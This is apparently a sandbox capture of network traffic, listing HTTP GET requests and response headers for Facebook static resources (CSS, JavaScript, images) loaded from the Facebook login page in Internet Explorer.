permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: UpNiWlffqjlIuf1nAZhhqw==
X-FB-Debug: kJnMDXn9Aa4BAHrvq8KztDF9zFTh97CoP0mHYGSt1/x35gJ5OMvoEfhJ8gp9eMy2OiMWbg1Y+e934U9h65R7MQ==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 9798
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/y6/l/0,cross/xx_kouuGNk2.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/y6/l/0,cross/xx_kouuGNk2.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 20:56:42 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: VQtB9pAx/N+AtfzQphsojg==
X-FB-Debug: umD2t/gQQBw/y2nLPbbtVDLIAvB/bLSM4CPVRbzYtK22q5SyiKh5It37Ln4iK48Na8iWFdHwYb417xF2v9e9Ug==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 771
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0,cross/DB8Huzq8P9n.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/y5/l/0,cross/DB8Huzq8P9n.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Mon, 23 Sep 2024 17:31:41 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: VBK/57AI15Iv5vQPoOVuPw==
X-FB-Debug: 79kVufQIrfxDjr8RRsroZBjmeHrD3WP4ExYxzVnsEmFTFrpCZYSLsXo6yoFKYWGVnkSC+L+tDaQ9zSdd48xmRA==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 974
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0,cross/jszcM5LFidI.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/yH/l/0,cross/jszcM5LFidI.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 19:24:32 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: vDvuPB8tDbdhAj8xpcl6PA==
X-FB-Debug: kZKNBMn+McX+mTMwBZ24oGJFXd+QQfwoOk3B3BYLuSHxQebb7tRLH/eMmfNVEXrRjLUSvVuR2WZKTmS/+OjFFg==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 4029
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: OcEdZWIg79UvSWVADRSQCg==
Expires: Sat, 28 Sep 2024 22:45:29 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
X-FB-Debug: gOe8Di1sgiMxsAGjUnLLNbXNLnmZ2707UMC0IpXYaEwgLvcL71m00uOJZfnT6CM9bmMp21cDUPPl93biY73qqQ==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 95
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/y1/r/dXk5exdOVhk.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Thu, 03 Oct 2024 19:51:44 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: ivkhXUQG4wQzNqI4NjhapA==
X-FB-Debug: OqWVCr+jpISO5hEageqfiA9SSq4+KdbiYmUZrbO9ZpCcffQ4bpRWGXmVmd+bS1vTfUdgELHaU3i2+VSENxmqGQ==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 302
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yn/r/pukjd1lDNzh.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 02:27:45 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: mbSOjwZV3q/6hOr28/4qRA==
X-FB-Debug: M/p/8meR6054oPdiIR3DFRhXaGLlLNPevPuiINenvbNYIrIa62n3kkSzAFv4P82rKPTBLn1/sUopzjg28WPxIg==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 6030
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yr/r/6XlDJXhMTmo.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 28 Sep 2024 17:47:40 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: QMAAX4j23G1VFnfuuNeJhQ==
X-FB-Debug: cSl828esKY67oe6dpKkBdZ+Aj5SUgFVrTdUdpA1F8e0MD75+7ml39Sp1K2BOoC1Bs4ais9G8wLp0P0yIXVc7iA==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 2090
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/y0/r/1Wa4Bq8ekru.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Thu, 03 Oct 2024 21:27:41 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
x-fb-optimizer: 0
content-md5: h5Gyp0PGvH/9ItylSdqNyw==
X-FB-Debug: TxWYubwcUjPu1I4FJ31ogYcZ8h3qMT0ziD/cA6e39Buv1s3IdiWymAImME06Br9gHspAIMgX5LAGNfBi+7EzDg==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 12520
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 02:29:52 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: 8+8w3OlaRgQuE5P3aQtiSA==
X-FB-Debug: zF7HE7/SZs2NU5mSFL5aKVuwk9RBnP7ZXsFJLMY9OCUhUezSFR8FsRAdvysaVPVMgKjo+5VnAaW+E2Ck91mxjQ==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 7959
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/yf/l/0,cross/Vgv8SHTD4rI.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/yf/l/0,cross/Vgv8SHTD4rI.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 19:24:30 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: zO61X6u+yg4JGmTlYuQ5Fw==
X-FB-Debug: me8lDMhTFYe8pcenQFQi6yvV+lmg2dtIAk4UHB19FvYeRHGHD5F6Gy0ZsXuL3DkuNg4qMYVgT37vvl2sacnl3A==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 8196
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/yI/r/4aAhOWlwaXf.svg HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: image/svg+xml
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sun, 06 Oct 2024 02:15:50 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: 7LTAFoD2FIsnNV1/7L5XgQ==
X-FB-Debug: SBhx3r3vs9PmQpRMl+a/+iE8hhyN6NJDQPxYh8qKHmMzGEs6M1bmJ+Gn89brebskHH/q8TEUreQhRSB4uLB2nA==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 986
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3i7M54/yn/l/en_US/WW_dM8tCcty.js?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3i7M54/yn/l/en_US/WW_dM8tCcty.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Wed, 02 Oct 2024 18:21:08 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: w+FkaEhozfZTItV2a+dvwg==
X-FB-Debug: wf/nRIiL6PBWOjqipY4MNlAJF3E2dZX3tXTYWzQ2vT/KVonCUhm8NjzlqSn8arGeEc+f+8u2SADHHlkpIxq/cA==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 15219
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yB/r/Y0L6f5sxdIV.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: hFRfTj3CmfIMC+ZxDLCYWA==
Expires: Thu, 26 Sep 2024 23:10:22 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
X-FB-Debug: L1vkb0BLXjOzlzguwOeC0FgIcb3VCObxYp1mz1TkbldRtDsNwxShS8JcVlqXmeLYNRbRRZlvggkDm/DxACf+JQ==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 6739
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
content-md5: jN3KQn2um5Jec0MvhzPgWg==
Expires: Thu, 03 Oct 2024 23:53:51 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
X-FB-Debug: dOe88OklZEt1oLoGIiJn//A/PHBn/bi88Kr8jxPcphJgPN8OPNY5AaPJcIi0EJtMk9sJ8b0GDLM9dy5HOt5JWw==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 4286
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yj/r/5ZTMade4JZA.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 05 Oct 2024 18:14:25 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: XaDqqfphLAb5fzpmOlyCJQ==
X-FB-Debug: HDuEvgLmFIcO29ttLcTurdk9FsGBHU1zMAkehxXN/Z1RYT69HLRibw50Sb0MtYqbr3vdHvmwNG3XikMeXEuumQ==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 12860
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yF/r/FLJXkx8ys-6.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 28 Sep 2024 22:46:04 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: MRbkZP9SId4o1H8vcdRfeg==
X-FB-Debug: 6FjKoQAijK7rOKhdmQlySTMhp/0cc/YGYpad9ChyB6fs7EW4twa9r5kdozpRB7nJRB13dimxCBHNrsVfRpKPFA==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 3217
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3iPwL4/yi/l/en_US/AAnuEkJqILS.js?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3iPwL4/yi/l/en_US/AAnuEkJqILS.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 18:03:22 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: H3t7Epi+H4mXxMo/NMXUIA==
X-FB-Debug: EtUAFlFrauf7VW67WdH8bgNFrmk1BPHFWQ2DejJLpRZnYNU2aG9JQkcLRcPjLdwTOBLZy/B5FmjjFHBhLM77kQ==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 5926
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yG/r/K3qKc0LZC6p.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Mon, 30 Sep 2024 18:22:48 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: 9vN05d9CnDn5o9VAMZLeaQ==
X-FB-Debug: dEkCsiwrtqsjqlP8j5jYrrdQCVhKipPm/n3aePDO6DOT2flCiynNs5rYtgisbNssUoz8GttRR4aSPuZQ22KjUA==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 6764
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yt/r/jIUN0Hn2kpD.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 28 Sep 2024 18:32:37 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
content-md5: pl0JqNDekyZ6hCD9BIH9Dw==
X-FB-Debug: 8UgGcT5vavVB3Y+V19370Rw8tkO9Soed7HDAhE0LqXrErMocaOWvEzpns8QuJYU3dPqPYvy3PWE2vT7prW49QQ==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 2164
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: text/css, */*
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/css; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 05 Oct 2024 02:24:58 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
